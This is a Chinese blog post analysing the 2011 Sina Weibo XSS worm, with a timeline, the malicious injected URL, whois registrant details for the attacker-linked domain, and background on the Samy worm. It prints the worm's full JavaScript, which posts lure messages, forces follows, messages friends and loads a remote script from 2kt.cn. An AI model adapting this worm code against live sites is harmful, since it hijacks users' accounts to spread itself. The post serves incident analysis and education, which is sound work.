新浪被攻击

最新推荐文章于 2024-08-27 07:30:00 发布
最新推荐文章于 2024-08-27 07:30:00 发布
阅读量3.2k 收藏 1
点赞数
分类专栏: 开发与调试 文章标签: function 新浪微博 xmlhttprequest url date random
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/viper/article/details/6591886
版权
 

从网上整理的,最初发布在: http://user.qzone.qq.com/31731705/blog/1309316738

一、事件的经过

2011年6月28日晚,新浪微博突然出现大范围“中毒”,大量用户自动发送“建党大业中穿帮的地方”、“个税起征点有望提到4000”、“郭美美事件的一些未注意到的细节”、“3D肉团团高清普通话版种子”等带链接的微博与私信,并自动关注一位名为hellosamy的用户。

事件的经过线索如下:

20:14,开始有大量带V的认证用户中招转发蠕虫
20:30,2kt.cn中的病毒页面无法访问
20:32,新浪微博中hellosamy用户无法访问
21:02,新浪漏洞修补完毕

影响有多大:32961(这位hellosamy在帐号被封前的好友数量)。

二、采用了什么样的攻击方法

1、利用了新浪微博存在的XSS漏洞;

2、使用有道提供的短域名服务(这些网址目前已经“无害”);

例如,通过http://163.fm/PxZHoxn,将链接指向:
http://weibo.com/pub/star/g/xyyyd%22%...

3、当新浪登陆用户不小心访问到相关网页时,由于处于登录状态,会运行这个js脚本做几件事情:

a.发微博(让更多的人看到这些消息,自然也就有更多人受害);
b.加关注,加uid为2201270010的用户关注——这应该就是大家提到的hellosamy了;
c.发私信,给好友发私信传播这些链接;

4. 其利用了微博广场页面 http://weibo.com/pub/star 的一个URL注入了js脚本,其通过http://163.fm/PxZHoxn 短链接服务,将链接指向:
http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update
注意,上面URL链接中的其实就是<script src=//www.2kt.cn/images/t.js></script>。


三、攻击者是谁?

攻击者不一定是2kt.cn的拥有者。目前暂时只能获得2kt.cn域名、网站拥有者信息如下。
不排除这个网站被攻击后,服务器被人放置恶意代码。

通过whois查询,2kt.cn的域名拥有者信息如下:

localhost% whois 2kt.cn

Domain Name: 2kt.cn

ROID: 20081025s10001s69222533-cn

Domain Status: ok

Registrant Organization: 北京新网数码信息技术有限公司

Registrant Name: 张志

Administrative Email: lin5061@gmail.com

Sponsoring Registrar: 北京新网数码信息技术有限公司

Name Server:ns.xinnetdns.com

Name Server:ns.xinnet.cn

Registration Date: 2008-10-25 04:22

Expiration Date: 2011-10-25 04:22

通过工信部的备案查询:http://www.miibeian.gov.cn/publish/qu...

网站负责人姓名:刘孝德
网站备案/许可证号:苏ICP备10108026号-1

四、为什么叫hellosamy?

2005年,首个利用跨站点脚本缺陷的蠕虫samy被“创造”出来了。Samy利用网站设计方面的缺陷,创建了一份“恶意”的用户档案,当该用户档案被浏览时,就会自动地激活代码,将用户添加到Samy的“好友”列表中。另外,恶意代码还会被拷贝到用户的档案中,当其他人查看用户的档案时,蠕虫会继续传播。Samy蠕虫能够造成与拒绝服务相当的效应,会造成好友列表中好友数量呈指数级增长,最终会消耗系统的大量资源。

因此,这次新浪微博的蠕虫,象是在对samy蠕虫致敬

五、参考信息

samy蠕虫的传播经历与技术细节:http://namb.la/popularhttp://namb.la/popular/tech.html

六、本次蠕虫事件中的代码下载
http://t.cn/aNhKgc?u=1319542477

function createXHR(){
return window.XMLHttpRequest?
new XMLHttpRequest():
new ActiveXObject("Microsoft.XMLHTTP");
}

function getappkey(url){
xmlHttp = createXHR();
xmlHttp.open("GET",url,false);
xmlHttp.send();
result = xmlHttp.responseText;
id_arr = '';
id = result.match(/namecard=\"true\" title=\"[^\"]*/g);
for(i=0;i<id.length;i++){
sum = id[i].toString().split('"')[3];
id_arr += sum + '||';
}

return id_arr;
}

function random_msg(){
link = ' http://163.fm/PxZHoxn?id=' + new Date().getTime();;
var msgs = [
'郭美美事件的一些未注意到的细节:',
'建党大业中穿帮的地方:',
'让女人心动的100句诗歌:',
'3D肉团团高清普通话版种子:',
'这是传说中的神仙眷侣啊:',
'惊爆!范冰冰艳照真流出了:',
'杨幂被爆多次被潜规则:',
'傻仔拿锤子去抢银行:',
'可以监听别人手机的软件:',
'个税起征点有望提到4000:'];
var msg = msgs[Math.floor(Math.random()*msgs.length)] + link;
msg = encodeURIComponent(msg);
return msg;
}

function post(url,data,sync){
xmlHttp = createXHR();
xmlHttp.open("POST",url,sync);
xmlHttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8");
xmlHttp.send(data);
}

function publish(){
url = 'http://weibo.com/mblog/publish.php?rnd=' + new Date().getTime();
data = 'content=' + random_msg() + '&pic=&styleid=2&retcode=';
post(url,data,true);
}

function follow(){
url = 'http://weibo.com/attention/aj_addfollow.php?refer_sort=profile&atnId=profile&rnd=' + new Date().getTime();
data = 'uid=' + 2201270010 + '&fromuid=' + $CONFIG.$uid + '&refer_sort=profile&atnId=profile';
post(url,data,true);
}

function message(){
url = 'http://weibo.com/' + $CONFIG.$uid + '/follow';
ids = getappkey(url);
id = ids.split('||');

for(i=0;i<id.length - 1 & i<5;i++){
msgurl = 'http://weibo.com/message/addmsg.php?rnd=' + new Date().getTime();
msg = random_msg();
msg = encodeURIComponent(msg);
user = encodeURIComponent(encodeURIComponent(id[i]));
data = 'content=' + msg + '&name=' + user + '&retcode=';
post(msgurl,data,false);
}
}

function main(){
try{
publish();
}

catch(e){}
try{
follow();
}
catch(e){}
try{
message();
}
catch(e){}
}

try{
x="g=document.createElement('script');g.src='http://www.2kt.cn/images/t.js';document.body.appendChild(g)";window.opener.eval(x);
}
catch(e){}
main();
var t=setTimeout('location="http://weibo.com/pub/topic";',5000);

招RD和QA
关注
专栏目录
新浪微博2011年6月受到过xss蠕虫攻击简析
如果我年少有为不自卑
10-23 2346
function createXHR(){ return window.XMLHttpRequest? new XMLHttpRequest(): new ActiveXObject("Microsoft.XMLHTTP"); } function getappkey(url){ xmlHttp = createXHR(); xm...
新浪AppKey 零视界新浪微博AppKey批量验证工具 v1.1
11-09
AppKey不仅是安全性的保障,也是防止滥用和恶意攻击的重要手段。 零视界新浪微博AppKey批量验证工具 v1.1的出现,极大地简化了开发者验证AppKey的过程。该工具具备批量验证功能,允许用户一次性输入多个AppKey,...
blog被攻击
测试
01-11 292
我的博客又回来了 今天上午尝试了n*方法 然而我的blog又回来了,最近在准备期末考试,苦逼的大学生要到1.25号才能放假;呜呜~~~ 寒假开始就要开始刷蓝桥杯题了;我一定会在第一时间分享给大家的; Wow,竟然可以用html语法和markdown一块写博客了,好有趣啊!我一定会经常更新自己的blog的; ...
新浪微博攻击事件看SNS网站的安全问题
风流剑客
12-09 2599
摘要:相对于用户隐私泄露,SNS网络的XSS蠕虫的危害就要更大了。蠕虫是指可以通过网络进行传播和感染的恶性病毒,其最大的特点就是可以自己借助网络环境进行自我复制和感染。 新浪微博遭受XSS跨站脚本攻击实例分析 相对于用户隐私泄露,SNS网络的XSS蠕虫的危害就要更大了。蠕虫是指可以通过网络进行传播和感染的恶性病毒,其最大的特点就是可以自己借助网络环境进行自我复制和感染。自从Ajax技术
博客园被DDoS + CC攻击后:开发团队的应对策略与危机管理
最新发布
Unity打怪升级
08-27 541
在数字化时代,网络攻击已成为企业和组织必须面对的现实威胁。最近,博客园遭受了一次DDoS(分布式拒绝服务)和CC(挑战碰撞)攻击,导致服务中断和访问困难。本文将探讨开发团队如何应对这类突发技术故障和危机。
博客被恶意攻击的几点思考
Elltor
10-19 861
今天我的网站被恶意攻击了,总有些人不怀好心想整些事情,对于这些人我们呵呵一下就行了,不必太过计较。我们把自己的网站安全措施做的更好些,以免让某些小人得逞。 第一个是恶意评论,因为我的个人博客评论是开放的,因为没有评论节流措施而导致被疯狂评论。下面是截图,足足评论了七八页近一百条。 第二个是SQL注入攻击,从图中可以明显看出其中夹杂了删除user表的操作。 个人网站由于安全措施做的不到位很容易被攻击, 今天我遇到的还不算是特别麻烦的攻击, 再次提醒大家多注意网站安全问题! 这也提醒我们在后端设计接口时,尤
如何防止网站被攻击 防止网站数据被入侵篡改
网站安全专家
08-07 1643
网站、APP,以及服务器每天都会遭受到DDOS流量攻击,据SINE安全统计,目前互联网2019年上半年的流量攻击趋势明显增加,每天接触到的流量攻击事件达到两千多次,与去年的攻击数据相比较有所微上升。国内大部分的网站,APP应用都使用的是阿里云,以及腾讯云,百度云的服务器,通过上述三家公开的一些流量攻击报告,从流量攻击事件,挖矿病毒,僵尸肉鸡,网站篡改攻击事件中,来总结一下今年上半年的DDOS流量攻...
浅谈跨网站脚本攻击(XSS)的手段与防范(简析新浪微博XSS攻击事件)
03-04
新浪微博攻击事件跨网站脚本(Cross-sitescripting,通常简称为XSS或跨站脚本或跨站脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受...
仿新浪微博php程序xweibo
06-08
PHP开发中,防止SQL注入、XSS攻击、CSRF攻击等安全问题至关重要。XWeibo的开发者需要对这些威胁有深刻认识,并在代码中实施相应的防护措施。 10. **单元测试和持续集成** 为了保证代码质量,XWeibo可能采用了...
PHP采用curl模仿用户登陆新浪微博发微博的方法
10-25
在网络安全领域,旁注攻击是一种常见的攻击手段,攻击者可能利用一个网站或服务的安全漏洞来攻击另一个同服务器的网站或服务。这是通过分析服务器结构和各服务的安全漏洞来实现的。 总结来说,PHP利用curl模仿用户...
四六级最后一天必重温的一百词汇
04-19
考前重要词汇重温,让你在考前信心大增,为超常发挥做准备
一些很值得深思的PPT
12-24
很值得深思,很值得下载,ppt,自己看看吧
数学后于地理环境亘古未有十二码球地
12-14
数学后于地理环数学后于地理环境亘古未有十二码球地境亘古未有十二码球数学后于地理环境亘古未有十二码球地地
关于笔者个人博客访问与攻击的一个小统计,最常被利用的居然不是PHP框架?
AugustTheodor的博客
01-06 4676
目录 前言 测试时间 测试用脚本 测试结果(ip部分) 测试结果(url部分) 前言 我只是闲的没事,但是这一统计下来确实发现了一些有意思的事情。我的个人博客(AugustTheodor的个人博客)由2020年6月21日建立,暂时运营到2022年1月5日为止(暂时还没想好换什么服务器,有点想整一个树莓派所以先不续费了^ ^)。使用的web框架是django,并且禁用了其自带的后台插件,理论上是一个不会被事件型漏洞攻破的网站。 测试时间 2020年七月到2021年十二月,截止此文章发布之
XSS跨站脚本攻击实例讲解,新浪微博XSS漏洞过程分析
weixin_34186128的博客
07-11 604
2011年6月28日晚,新浪微博遭遇到XSS蠕虫攻击侵袭,在不到一个小时的时间,超过3万微博用户受到该XSS蠕虫的攻击。此事件给严重依赖社交网络的网友们敲响了警钟。在此之前,国内多家著名的SNS网站和大型博客网站都曾遭遇过类似的攻击事件,只不过没有形成如此大规模传播。虽然此次XSS蠕虫攻击事 件中,恶意黑客攻击者并没有在恶意脚本中植入挂马代码或其他窃取用户账号密码信息的脚本,但是这至少说明,病毒木...
第十一届蓝桥杯省赛第一场原题
houzi0316的博客
07-07 4925
试题 A: 指数计算 本题总分:5 分 【问题描述】 7 月 1 日是建党日,从 1921 年到 2020 年,中国共产党已经带领中国人民 走过了 99 年。 请计算:7 ^ 2020 mod 1921,其中 A mod B 表示 A 除以 B 的余数。 【答案提交】 这是一道结果填空题,你只需要算出结果后提交即可。本题的结果为一个 整数,在提交答案时只填写这个整数,填写多余的内容将无法得分。 思路解析:先求出 7 的 2020 次方肯定是很大的数(废话),再用该数除以 1921 取余数。 方法一: 打开电
新浪微薄被攻击的代码。。。
06-29 972
来源:http://www.2kt.cn/images/t.jsfunction createXHR(){ return window.XMLHttpRequest? new XMLHttpRequest(): new ActiveXObject("Microsoft.XMLHTTP");}function getappkey(url){ xmlHttp = createXHR(); xm
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值